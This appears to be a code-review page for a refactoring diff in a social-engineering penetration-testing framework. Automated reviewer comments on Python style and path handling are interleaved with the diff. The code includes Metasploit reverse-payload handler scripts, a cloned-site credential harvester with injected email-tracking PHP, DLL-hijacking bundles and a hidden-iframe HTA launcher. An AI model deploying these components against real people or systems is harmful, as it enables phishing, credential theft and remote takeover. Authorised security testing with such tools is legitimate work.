# create our metasploit answer file
|
||||
filewrite = file(setdir + "answer.txt", "w")
|
||||
filewrite = file(userconfigpath + "answer.txt", "w")
|
||||
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\n%s\nexploit -j" % (payload,ipaddr,port,url))
|
||||
filewrite.close()
|
||||
# spawn a multi/handler listener
|
||||
subprocess.Popen("msfconsole -r %sanswer.txt" % (setdir), shell=True).wait()
|
||||
subprocess.Popen("msfconsole -r %sanswer.txt" % (userconfigpath), shell=True).wait()
|
||||
print_status("[*] Housekeeping old files...")
|
||||
# if our answer file is still there (which it should be), then remove it
|
||||
if os.path.isfile(setdir + "answer.txt"):
|
||||
if os.path.isfile(userconfigpath + "answer.txt"):
|
||||
# remove the old file, no longer used once we've exited
|
||||
subprocess.Popen("rm " + setdir + "answer.txt", shell=True).wait()
|
||||
subprocess.Popen("rm " + userconfigpath + "answer.txt", shell=True).wait()
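Review bot: Both writes on the new side still call `file(...)`, as in `file(userconfigpath + "answer.txt", "w")`; `file()` exists only in Python 2 and raises `NameError` under Python 3. `with open(userconfigpath + "answer.txt", "w") as filewrite:` works on both and closes the handle even if the write fails. The final cleanup can be `os.remove(userconfigpath + "answer.txt")` rather than `rm` through a shell. The status message names `reports/binary2teensy` while the file actually written is `reports/binary2teensy.ino`.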
|
||||
|
||||
|
|
|
@ -29,7 +29,7 @@ now = datetime.datetime.today()
|
|||
if operating_system != "windows":
|
||||
import pexpect
|
||||
|
||||
# check to see if setdir is created
|
||||
# check to see if userconfigpath is created
|
||||
if not os.path.isdir(os.path.join(core.userconfigpath, "reports")):
|
||||
os.makedirs(os.path.join(core.userconfigpath, "reports"))
|
||||
|
||||
|
@ -84,7 +84,7 @@ with open(os.path.join(core.userconfigpath, "teensy")) as fileopen:
|
|||
|
||||
def writefile(filename, now):
|
||||
with open(os.path.join("src/teensy/" + filename)) as fileopen, \
|
||||
open(os.path.join(core.userconfigpath, "/reports/teensy_{0}.ino".format(now)), "w") as filewrite:
|
||||
open(os.path.join(core.userconfigpath, "reports/teensy_{0}.ino".format(now)), "w") as filewrite:
|
||||
|
||||
for line in fileopen:
|
||||
match = re.search("IPADDR", line)
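Review bot: In `writefile`, `os.path.join("src/teensy/" + filename)` is called with a single argument, so it returns the concatenated string unchanged and the join does nothing; `os.path.join("src", "teensy", filename)` would match how the output path on the next line is built. The updated comment `# check to see if userconfigpath is created` does not describe the code below it, which checks and creates the `reports` subdirectory; `# make sure the reports directory exists` would. `writefile` continues past the end of the hunk.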
|
||||
|
|
|
@ -13,15 +13,15 @@ port = ""
|
|||
# see if multi_attack is being used and prep everything we need
|
||||
multiattack = "off"
|
||||
webdav_enabled = "off"
|
||||
if os.path.isfile(setdir + "/multi_payload"):
|
||||
if os.path.isfile(userconfigpath + "multi_payload"):
|
||||
multiattack = "on"
|
||||
# just need a simple filewrite to generate a file if webdav is enabled
|
||||
# this is used for multi attack, it will write out file to program junk
|
||||
# then a simple check will determine if webdav is enabled for the port
|
||||
webdav_enabled = "off"
|
||||
webdav_write = open(setdir + "/webdav_enabled", "w")
|
||||
webdav_write = open(userconfigpath + "webdav_enabled", "w")
|
||||
|
||||
fileopen = open(setdir + "/multi_payload", "r")
|
||||
fileopen = open(userconfigpath + "multi_payload", "r")
|
||||
for line in fileopen:
|
||||
match = re.search("MAIN=", line)
|
||||
if match:
|
||||
|
@ -60,8 +60,8 @@ for line in configfile:
|
|||
|
||||
# grab attack vector
|
||||
attack_vector = ""
|
||||
if os.path.isfile(setdir + "/attack_vector"):
|
||||
fileopen = open(setdir + "/attack_vector")
|
||||
if os.path.isfile(userconfigpath + "attack_vector"):
|
||||
fileopen = open(userconfigpath + "attack_vector")
|
||||
for line in fileopen:
|
||||
attack_vector = line.rstrip()
|
||||
|
||||
|
@ -107,10 +107,10 @@ if multiattack == "off":
|
|||
port = "443"
|
||||
|
||||
# check to see if we need to use the multi attack vector in java
|
||||
if not os.path.isfile(setdir + "/multi_java"):
|
||||
filewrite = open(setdir + "/meta_config", "w")
|
||||
if os.path.isfile(setdir + "/multi_java"):
|
||||
filewrite = open(setdir + "/meta_config", "a")
|
||||
if not os.path.isfile(userconfigpath + "multi_java"):
|
||||
filewrite = open(userconfigpath + "meta_config", "w")
|
||||
if os.path.isfile(userconfigpath + "multi_java"):
|
||||
filewrite = open(userconfigpath + "meta_config", "a")
|
||||
|
||||
filewrite.write("use " + exploit + "\n")
|
||||
filewrite.write("set PAYLOAD " + choice1 + "\n")
|
||||
|
@ -160,10 +160,10 @@ filewrite.write("set ExitOnSession false\n")
|
|||
|
||||
# if we are using multiple meterpreter multiscripts
|
||||
if meterpreter_multi == "ON":
|
||||
multiwrite = open(setdir + "/multi_meter.file", "w")
|
||||
multiwrite = open(userconfigpath + "multi_meter.file", "w")
|
||||
multiwrite.write(meterpreter_multi_command)
|
||||
filewrite.write(
|
||||
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir))
|
||||
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath))
|
||||
multiwrite.close()
|
||||
|
||||
# auto migration
|
||||
|
@ -180,6 +180,6 @@ if webdav_enabled == "on":
|
|||
# this basically sets a flag we need to make some custom changes in web_server.py to get
|
||||
# the docbase exploit to work properly
|
||||
if exploit == ("windows/browser/java_docbase_bof"):
|
||||
filewrite = open(setdir + "/docbase.file", "w")
|
||||
filewrite = open(userconfigpath + "docbase.file", "w")
|
||||
filewrite.write("DOCBASE=ON")
|
||||
filewrite.close()
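Review bot: The hunk at 107 picks the open mode for `meta_config` with two separate `isfile` tests on `multi_java`, so if the file's presence changes between them neither branch assigns `filewrite` and the `filewrite.write` that follows uses an unbound or stale name. One test is enough: `mode = "a" if os.path.isfile(userconfigpath + "multi_java") else "w"` followed by `filewrite = open(userconfigpath + "meta_config", mode)`. In the hunk at 13, `webdav_write` and `fileopen` are opened without a visible close; whether they are closed later cannot be seen from here.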
|
||||
|
|
|
@ -60,7 +60,7 @@ for line in fileopen:
|
|||
print("\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension, dll))
|
||||
|
||||
# prep the directories
|
||||
subprocess.Popen("mkdir " + setdir + "/dll", stdout=subprocess.PIPE,
|
||||
subprocess.Popen("mkdir " + userconfigpath + "dll", stdout=subprocess.PIPE,
|
||||
stderr=subprocess.PIPE, shell=True).wait()
|
||||
filename1 = input(setprompt(
|
||||
["2", "15"], "Enter the filename for the attack (example:openthis) [openthis]"))
|
||||
|
@ -68,7 +68,7 @@ if filename1 == "":
|
|||
filename1 = "openthis"
|
||||
|
||||
# move the files there using the correct extension and file type
|
||||
filewrite = open(setdir + "/dll/%s%s" % (filename1, extension), "w")
|
||||
filewrite = open(userconfigpath + "dll/%s%s" % (filename1, extension), "w")
|
||||
filewrite.write("EMPTY")
|
||||
filewrite.close()
|
||||
|
||||
|
@ -82,7 +82,7 @@ else:
|
|||
fileopen = open("src/webattack/dll_hijacking/hijacking.dll", "rb")
|
||||
data = fileopen.read()
|
||||
|
||||
filewrite = open(setdir + "/dll/%s" % (dll), "wb")
|
||||
filewrite = open(userconfigpath + "dll/%s" % (dll), "wb")
|
||||
|
||||
host = int(len(ipaddr) + 1) * "X"
|
||||
|
||||
|
@ -127,7 +127,7 @@ if choice == "1":
|
|||
# we get a hit?
|
||||
if match:
|
||||
subprocess.Popen("cd %s/dll;rar a %s/template.rar * 1> /dev/null 2> /dev/null" %
|
||||
(setdir, setdir), shell=True).wait()
|
||||
(userconfigpath, userconfigpath), shell=True).wait()
|
||||
counter = 1
|
||||
|
||||
# if we didnt find rar
|
||||
|
@ -139,11 +139,11 @@ if choice == "1":
|
|||
# if its a zipfile zip the badboy up
|
||||
if choice == "2":
|
||||
# write to a zipfile here
|
||||
file = zipfile.ZipFile(setdir + "/template.zip", "w")
|
||||
for name in glob.glob(setdir + "/dll/*"):
|
||||
file = zipfile.ZipFile(userconfigpath + "template.zip", "w")
|
||||
for name in glob.glob(userconfigpath + "dll/*"):
|
||||
file.write(name, os.path.basename(name), zipfile.ZIP_DEFLATED)
|
||||
file.close()
|
||||
|
||||
if os.path.isfile(setdir + "/msf.exe"):
|
||||
if os.path.isfile(userconfigpath + "msf.exe"):
|
||||
subprocess.Popen("cp %s/msf.exe %s/src/html/" %
|
||||
(setdir, definepath), shell=True).wait()
|
||||
(userconfigpath, definepath), shell=True).wait()
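Review bot: The directory preparation in the hunk at 60 shells out to `mkdir` with the path concatenated unquoted and pipes both streams without reading them. A failure, or a config path containing a space, therefore goes unreported, and the `open(userconfigpath + "dll/...")` in the next hunk fails instead. The report-directory code elsewhere in this commit already uses the library form; here that would be `if not os.path.isdir(userconfigpath + "dll"): os.makedirs(userconfigpath + "dll")`. In the hunk at 139 the local name `file` shadows the Python 2 builtin; a name such as `archive` would be clearer.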
|
||||
|
|
|
@ -75,7 +75,7 @@ except Exception as err:
|
|||
|
||||
|
||||
attack_vector = ""
|
||||
fileopen = open(setdir + "/attack_vector", "r")
|
||||
fileopen = open(userconfigpath + "attack_vector", "r")
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
if line == 'multiattack':
|
||||
|
@ -111,7 +111,7 @@ for line in fileopen:
|
|||
if match2:
|
||||
command_center = "on"
|
||||
command_center_write = open(
|
||||
setdir + "/cc_harvester_hit" % (setdir), "w")
|
||||
userconfigpath + "cc_harvester_hit" % (userconfigpath), "w")
|
||||
|
||||
# if nada default port 80
|
||||
if counter == 0:
|
||||
|
@ -119,7 +119,7 @@ if counter == 0:
|
|||
|
||||
# pull URL field
|
||||
counter = 0
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("URL=", line)
|
||||
|
@ -166,10 +166,10 @@ for line in fileopen:
|
|||
sys.path.append("src/core/ssl")
|
||||
# import our ssl module
|
||||
import setssl
|
||||
subprocess.Popen("cp %s/CA/*.pem %s" % (setdir, setdir),
|
||||
subprocess.Popen("cp %s/CA/*.pem %s" % (userconfigpath, userconfigpath),
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
# remove old junk we dont need anymore
|
||||
subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (setdir, setdir),
|
||||
subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (userconfigpath, userconfigpath),
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
|
||||
# if user wants to specify his/her own PEM certificate
|
||||
|
@ -184,7 +184,7 @@ for line in fileopen:
|
|||
print("\nUnable to find PEM file, check location and config again.")
|
||||
exit_set()
|
||||
if os.path.isfile(pem_client):
|
||||
subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, setdir),
|
||||
subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, userconfigpath),
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
match2 = re.search("PEM_SERVER=", line)
|
||||
if match2:
|
||||
|
@ -193,7 +193,7 @@ for line in fileopen:
|
|||
print("\nUnable to find PEM file, check location and config again.")
|
||||
exit_set()
|
||||
if os.path.isfile(pem_server):
|
||||
subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, setdir),
|
||||
subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, userconfigpath),
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
|
||||
# url decode for postbacks
|
||||
|
@ -211,8 +211,8 @@ def urldecode(url):
|
|||
|
||||
|
||||
# here is where we specify how many people actually visited versus fell for it
|
||||
visits = open(setdir + "/visits.file", "a")
|
||||
bites = open(setdir + "/bites.file", "a")
|
||||
visits = open(userconfigpath + "visits.file", "a")
|
||||
bites = open(userconfigpath + "bites.file", "a")
|
||||
|
||||
# SET Handler for handling POST requests and general setup through SSL
|
||||
|
||||
|
@ -247,7 +247,7 @@ class SETHandler(BaseHTTPRequestHandler):
|
|||
#print('-' * 40)
|
||||
pass
|
||||
|
||||
webroot = os.path.abspath(os.path.join(setdir, 'web_clone'))
|
||||
webroot = os.path.abspath(os.path.join(userconfigpath, 'web_clone'))
|
||||
requested_file = os.path.abspath(os.path.join(webroot, self.path))
|
||||
# try block setup to catch transmission errors
|
||||
try:
|
||||
|
@ -256,7 +256,7 @@ class SETHandler(BaseHTTPRequestHandler):
|
|||
self.send_response(200)
|
||||
self.send_header('Content_type', 'text/html')
|
||||
self.end_headers()
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r")
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r")
|
||||
for line in fileopen:
|
||||
self.wfile.write(line)
|
||||
# write out that we had a visit
|
||||
|
@ -268,7 +268,7 @@ class SETHandler(BaseHTTPRequestHandler):
|
|||
self.send_response(200)
|
||||
self.send_header('Content_type', 'text/html')
|
||||
self.end_headers()
|
||||
fileopen = open(setdir + "/web_clone/index2.html", "r")
|
||||
fileopen = open(userconfigpath + "web_clone/index2.html", "r")
|
||||
for line in fileopen:
|
||||
self.wfile.write(line)
|
||||
# write out that we had a visit
|
||||
|
@ -310,7 +310,7 @@ class SETHandler(BaseHTTPRequestHandler):
|
|||
# change path to root for append on file
|
||||
os.chdir(homepath)
|
||||
# put the params into site.template for later user
|
||||
filewrite = open(setdir + "/site.template", "a")
|
||||
filewrite = open(userconfigpath + "site.template", "a")
|
||||
filewrite.write("\n")
|
||||
if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())):
|
||||
filewrite3 = open("%s/src/logs/harvester.log" % os.getcwd(), "w")
|
||||
|
@ -356,7 +356,7 @@ class SETHandler(BaseHTTPRequestHandler):
|
|||
|
||||
# pull URL field
|
||||
counter = 0
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("URL=", line)
|
||||
|
@ -380,7 +380,7 @@ class SETHandler(BaseHTTPRequestHandler):
|
|||
'<html><head><meta HTTP-EQUIV="REFRESH" content="0; url=%s"></head></html>' % (RAW_URL))
|
||||
|
||||
# set it back to our homepage
|
||||
os.chdir(setdir + "/web_clone/")
|
||||
os.chdir(userconfigpath + "web_clone/")
|
||||
|
||||
|
||||
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
|
||||
|
@ -526,37 +526,37 @@ def run():
|
|||
(logpath, harvester_file), shell=True).wait()
|
||||
|
||||
# if we are using webjacking, etc.
|
||||
if os.path.isfile(setdir + "/web_clone/index2.html"):
|
||||
if os.path.isfile(userconfigpath + "web_clone/index2.html"):
|
||||
# need to copy the files over - remove the old one first if there
|
||||
if os.path.isfile(apache_dir + "/index2.html"):
|
||||
os.remove(apache_dir + "/index2.html")
|
||||
|
||||
shutil.copyfile(setdir + "/web_clone/index2.html",
|
||||
shutil.copyfile(userconfigpath + "web_clone/index2.html",
|
||||
apache_dir + "/index2.html")
|
||||
|
||||
# here we specify if we are tracking users and such
|
||||
if track_email == True:
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r")
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r")
|
||||
data = fileopen.read()
|
||||
data = data.replace(
|
||||
"<body>", """<body><?php $file = '%s'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (harvester_file))
|
||||
filewrite = open(setdir + "/web_clone/index.2", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/index.2", "w")
|
||||
filewrite.write(data)
|
||||
filewrite.close()
|
||||
os.remove(setdir + "/web_clone/index.html")
|
||||
shutil.copyfile(setdir + "/web_clone/index.2",
|
||||
setdir + "/web_clone/index.html")
|
||||
os.remove(userconfigpath + "web_clone/index.html")
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.2",
|
||||
userconfigpath + "web_clone/index.html")
|
||||
# copy the entire web_clone directory.
|
||||
# Without this only index.php|html are copied even though the user
|
||||
# may have chosen to import the entire directory in the set module.
|
||||
copyfolder(setdir + "/web_clone", apache_dir)
|
||||
copyfolder(userconfigpath + "web_clone", apache_dir)
|
||||
if os.path.isfile("%s/index.html" % (apache_dir)):
|
||||
os.remove("%s/index.html" % (apache_dir))
|
||||
if track_email == False:
|
||||
shutil.copyfile(setdir + "/web_clone/index.html",
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html",
|
||||
"%s/index.html" % (apache_dir))
|
||||
if track_email == True:
|
||||
shutil.copyfile(setdir + "/web_clone/index.html",
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html",
|
||||
"%s/index.php" % (apache_dir))
|
||||
print_status(
|
||||
"NOTE: The URL to click on is index.php NOT index.html with track emails.")
|
||||
|
@ -615,7 +615,7 @@ if webattack_email == True:
|
|||
module_reload(src.phishing.smtp.client.smtp_web)
|
||||
|
||||
# see if we're tabnabbing or multiattack
|
||||
fileopen = open(setdir + "/attack_vector", "r")
|
||||
fileopen = open(userconfigpath + "attack_vector", "r")
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
if line == 'tabnabbing':
|
||||
|
@ -628,12 +628,12 @@ for line in fileopen:
|
|||
if ssl_flag == 'true':
|
||||
web_port = "443"
|
||||
# check for PEM files here
|
||||
if not os.path.isfile(setdir + "/newreq.pem"):
|
||||
if not os.path.isfile(userconfigpath + "newreq.pem"):
|
||||
print("PEM files not detected. SSL will not work properly.")
|
||||
if not os.path.isfile(setdir + "/newcert.pem"):
|
||||
if not os.path.isfile(userconfigpath + "newcert.pem"):
|
||||
print("PEM files not detected. SSL will not work properly.")
|
||||
# copy over our PEM files
|
||||
subprocess.Popen("cp %s/*.pem %s/web_clone/" % (setdir, setdir),
|
||||
subprocess.Popen("cp %s/*.pem %s/web_clone/" % (userconfigpath, userconfigpath),
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
# copy patched socket over to web clone
|
||||
definepath = os.getcwd()
|
||||
|
@ -643,7 +643,7 @@ if ssl_flag == 'true':
|
|||
|
||||
# head over to cloned dir
|
||||
if apache_check == False:
|
||||
os.chdir(setdir + "/web_clone/")
|
||||
os.chdir(userconfigpath + "web_clone/")
|
||||
|
||||
if attack_vector != "multiattack":
|
||||
if apache_check == False:
|
||||
|
|
|
@ -7,8 +7,8 @@ import datetime
|
|||
from src.core.setcore import *
|
||||
|
||||
# make sure the reports directory is created
|
||||
if not os.path.isdir(setdir + "/reports/"):
|
||||
os.makedirs(setdir + "/reports/")
|
||||
if not os.path.isdir(userconfigpath + "reports/"):
|
||||
os.makedirs(userconfigpath + "reports/")
|
||||
|
||||
#
|
||||
# Quick report generation script
|
||||
|
@ -33,20 +33,20 @@ definepath = os.getcwd()
|
|||
|
||||
# grab URL and report information
|
||||
now = datetime.datetime.today()
|
||||
fileopen = open(setdir + "/site.template", "r")
|
||||
site_template = open(setdir + "/site.template", "r").readlines()
|
||||
fileopen = open(userconfigpath + "site.template", "r")
|
||||
site_template = open(userconfigpath + "site.template", "r").readlines()
|
||||
fileopen1 = open("%s/src/core/reports/index.html" % (definepath), "r")
|
||||
for line in fileopen:
|
||||
match = re.search("URL=", line)
|
||||
if match:
|
||||
url = line.replace("URL=http://", "")
|
||||
url = line.replace("URL=https://", "")
|
||||
filewrite2 = open(setdir + "/reports/%s.xml" % (now), "a")
|
||||
filewrite2 = open(userconfigpath + "reports/%s.xml" % (now), "a")
|
||||
filewrite2.write(r"""<?xml version="1.0" encoding='UTF-8'?>""" + "\n")
|
||||
filewrite2.write(r"<harvester>" + "\n")
|
||||
for line2 in fileopen1:
|
||||
counter = 0
|
||||
filewrite = open(setdir + "/reports/%s.html" % (now), "a")
|
||||
filewrite = open(userconfigpath + "reports/%s.html" % (now), "a")
|
||||
match1 = re.search("REPLACEHEREDUDE", line2)
|
||||
if match1:
|
||||
line2 = line2.replace("REPLACEHEREDUDE", url)
|
||||
|
@ -83,8 +83,8 @@ for line in fileopen:
|
|||
# look for how many people visited the website
|
||||
match5 = re.search("VISITORSHERE", line2)
|
||||
if match5:
|
||||
if os.path.isfile(setdir + "/visits.file"):
|
||||
fileopen3 = open(setdir + "/visits.file", "r")
|
||||
if os.path.isfile(userconfigpath + "visits.file"):
|
||||
fileopen3 = open(userconfigpath + "visits.file", "r")
|
||||
counter5 = 0
|
||||
for line in fileopen3:
|
||||
if line != "":
|
||||
|
@ -92,7 +92,7 @@ for line in fileopen:
|
|||
counter5 = counter5 + 1
|
||||
if line == "":
|
||||
counter5 = 0
|
||||
if not os.path.isfile(setdir + "/visits.file"):
|
||||
if not os.path.isfile(userconfigpath + "visits.file"):
|
||||
counter5 = 0
|
||||
|
||||
line2 = line2.replace("VISITORSHERE", str(counter5), 2)
|
||||
|
@ -101,13 +101,13 @@ for line in fileopen:
|
|||
|
||||
match6 = re.search("BITESHERE", line2)
|
||||
if match6:
|
||||
if os.path.isfile(setdir + "/bites.file"):
|
||||
fileopen4 = open(setdir + "/bites.file", "r")
|
||||
if os.path.isfile(userconfigpath + "bites.file"):
|
||||
fileopen4 = open(userconfigpath + "bites.file", "r")
|
||||
counter5 = 0
|
||||
for line in fileopen4:
|
||||
line = line.rstrip()
|
||||
counter5 = counter5 + 1
|
||||
if not os.path.isfile(setdir + "/bites.file"):
|
||||
if not os.path.isfile(userconfigpath + "bites.file"):
|
||||
counter5 = 0
|
||||
|
||||
line2 = line2.replace("BITESHERE", str(counter5))
|
||||
|
@ -125,6 +125,6 @@ except:
|
|||
pass
|
||||
|
||||
subprocess.Popen("cp -rf %s/src/core/reports/files %s/reports/" % (definepath,
|
||||
setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
print(bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (setdir, now) + bcolors.ENDC)
|
||||
print(bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (setdir, now) + bcolors.ENDC)
|
||||
userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
print(bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (userconfigpath, now) + bcolors.ENDC)
|
||||
print(bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (userconfigpath, now) + bcolors.ENDC)
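Review bot: The concatenations in this file, such as `userconfigpath + "reports/%s.html" % (now)`, only resolve correctly if `userconfigpath` ends with a path separator, while the `cp -rf` command and the two closing `print` lines still format it as `%s/reports/...`, so the two styles disagree about who supplies the slash. `userconfigpath` is defined outside this page's view, so the trailing separator is an assumption here. Building each path as `os.path.join(userconfigpath, "reports", "%s.html" % now)` removes that dependency and keeps the printed path identical to the one that was opened. The same mix of append and `%s/` formatting appears in the `mv`, `rm -rf`, `wget` and `msfconsole -r` command strings in the later files of this commit.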
|
||||
|
|
|
@ -24,13 +24,13 @@ else:
|
|||
# set the multiattack tabnabbing/webjacking flag
|
||||
multi_tabnabbing = "off"
|
||||
multi_webjacking = "off"
|
||||
if os.path.isfile(setdir + "/multi_tabnabbing"):
|
||||
if os.path.isfile(userconfigpath + "multi_tabnabbing"):
|
||||
multi_tabnabbing = "on"
|
||||
if os.path.isfile(setdir + "/multi_webjacking"):
|
||||
if os.path.isfile(userconfigpath + "multi_webjacking"):
|
||||
multi_webjacking = "on"
|
||||
|
||||
# see if we're tabnabbing
|
||||
fileopen = open(setdir + "/attack_vector", "r")
|
||||
fileopen = open(userconfigpath + "attack_vector", "r")
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
if line == 'tabnabbing' or multi_tabnabbing == "on" or line == 'webjacking' or multi_webjacking == "on":
|
||||
|
@ -59,8 +59,8 @@ if apache_mode == "on":
|
|||
apache_rewrite = "post.php"
|
||||
|
||||
# start the scraping process
|
||||
fileopen = open(setdir + "/web_clone/%s" % (site), "r").readlines()
|
||||
filewrite = open(setdir + "/web_clone/index.html.new", "w")
|
||||
fileopen = open(userconfigpath + "web_clone/%s" % (site), "r").readlines()
|
||||
filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
|
||||
for line in fileopen:
|
||||
|
||||
# specify if it found post params
|
||||
|
@ -102,9 +102,9 @@ for line in fileopen:
|
|||
# close the file
|
||||
filewrite.close()
|
||||
# move our newly created website with our post stuff to our cloned area
|
||||
if os.path.isfile(setdir + "/web_clone/index.html.new"):
|
||||
shutil.copyfile(setdir + "/web_clone/index.html.new", setdir + "/" + site)
|
||||
if os.path.isfile(setdir + "/web_clone/" + site):
|
||||
os.remove(setdir + "/web_clone/" + site)
|
||||
shutil.move(setdir + "/web_clone/index.html.new",
|
||||
setdir + "/web_clone/%s" % (site))
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html.new", userconfigpath + "" + site)
|
||||
if os.path.isfile(userconfigpath + "web_clone/" + site):
|
||||
os.remove(userconfigpath + "web_clone/" + site)
|
||||
shutil.move(userconfigpath + "web_clone/index.html.new",
|
||||
userconfigpath + "web_clone/%s" % (site))
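Review bot: `userconfigpath + "" + site` in the first `shutil.copyfile` call is a leftover of the mechanical `setdir + "/"` replacement; the empty string does nothing and obscures that this copy lands directly in the config directory rather than in `web_clone/`. Writing it as `os.path.join(userconfigpath, site)` states the target plainly. `site` is assigned outside this hunk; if it can ever carry a path separator or `..`, reducing it with `os.path.basename(site)` before joining would keep the copy, remove and move inside the intended directory.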
|
||||
|
|
|
@ -56,16 +56,16 @@ def gen_hta_cool_stuff():
|
|||
html_code = ("""<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>\n<script type="text/javascript">setTimeout(function(){window.location.href="%s";}, 15000);</script>""" % url)
|
||||
|
||||
# metasploit answer file here
|
||||
filewrite = open(setdir + "/meta_config", "w")
|
||||
filewrite = open(userconfigpath + "meta_config", "w")
|
||||
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port))
|
||||
filewrite.close()
|
||||
|
||||
# write out main1 and main2
|
||||
filewrite = open(setdir + "/hta_index", "w")
|
||||
filewrite = open(userconfigpath + "hta_index", "w")
|
||||
filewrite.write(html_code)
|
||||
filewrite.close()
|
||||
|
||||
# write out launcher.hta
|
||||
filewrite = open(setdir + "/Launcher.hta", "w")
|
||||
filewrite = open(userconfigpath + "Launcher.hta", "w")
|
||||
filewrite.write(main1 + main2 + main3 + main4)
|
||||
filewrite.close()
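Review bot: The three `open` / `write` / `close` sequences leave the handle open if `write` raises; a context manager closes it on every path, e.g. `with open(os.path.join(userconfigpath, "meta_config"), "w") as filewrite:`, and likewise for `hta_index` and `Launcher.hta`. gen_hta_cool_stuff starts above this hunk, so where `selection`, `ipaddr` and `port` come from is not visible here. Because they are written into the file later passed to `msfconsole -r`, a comment such as `# values must be single-line: each one becomes part of a resource-script line` would help the next maintainer.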
|
||||
|
|
|
@ -51,12 +51,12 @@ def flag_off(vector):
|
|||
|
||||
|
||||
def write_file(filename, results):
|
||||
filewrite = open(setdir + "/%s" % (filename), "w")
|
||||
filewrite = open(userconfigpath + "%s" % (filename), "w")
|
||||
filewrite.write(results)
|
||||
filewrite.close()
|
||||
|
||||
# specify attackvector
|
||||
filewrite = open(setdir + "/attack_vector", "w")
|
||||
filewrite = open(userconfigpath + "attack_vector", "w")
|
||||
filewrite.write("multiattack")
|
||||
filewrite.close()
|
||||
|
||||
|
@ -79,14 +79,14 @@ webdav_enable = "OFF"
|
|||
|
||||
# see if we are running a custom cloned website
|
||||
clonedurl = 0
|
||||
fileopen = open(setdir + "/site.template", "r")
|
||||
fileopen = open(userconfigpath + "site.template", "r")
|
||||
data = fileopen.read()
|
||||
if "TEMPLATE=SELF" in data:
|
||||
clonedurl = 1
|
||||
|
||||
# clean up cloner directory
|
||||
if clonedurl == 0:
|
||||
subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (setdir, setdir),
|
||||
subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (userconfigpath, userconfigpath),
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
|
||||
# set a quick loop to see what the user wants
|
||||
|
@ -349,7 +349,7 @@ if meta_attack == "on":
|
|||
|
||||
# this checks to see if the MSF payload uses webdav, if so we have to
|
||||
# force port 80
|
||||
if os.path.isfile(setdir + "/webdav_enabled"):
|
||||
if os.path.isfile(userconfigpath + "webdav_enabled"):
|
||||
webdav_enabled = "on"
|
||||
|
||||
# set this incase msf attack, java applet, and harvester is needed
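Review bot: `rm -rf %s/web_clone;mkdir %s/web_clone/` is run through a shell with `userconfigpath` interpolated unquoted, so a config path containing a space or a shell metacharacter changes which directory is removed, and because stdout and stderr are piped away a failure is silent. The standard library does the same without a shell: `shutil.rmtree(os.path.join(userconfigpath, "web_clone"), ignore_errors=True)` followed by `os.makedirs(os.path.join(userconfigpath, "web_clone"))`, assuming `shutil` is imported in this file (the import block is outside the hunk). The `cp -rf` in the report script and the `mv` in the tabnabbing script have the same shape and map to `shutil.copytree` and `shutil.move`.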
|
||||
|
|
|
@ -18,13 +18,13 @@ for line in fileopen:
|
|||
webjacking_timing = line
|
||||
|
||||
# grab attack_vector specification
|
||||
fileopen = open(setdir + "/attack_vector", "r")
|
||||
fileopen = open(userconfigpath + "attack_vector", "r")
|
||||
for line in fileopen:
|
||||
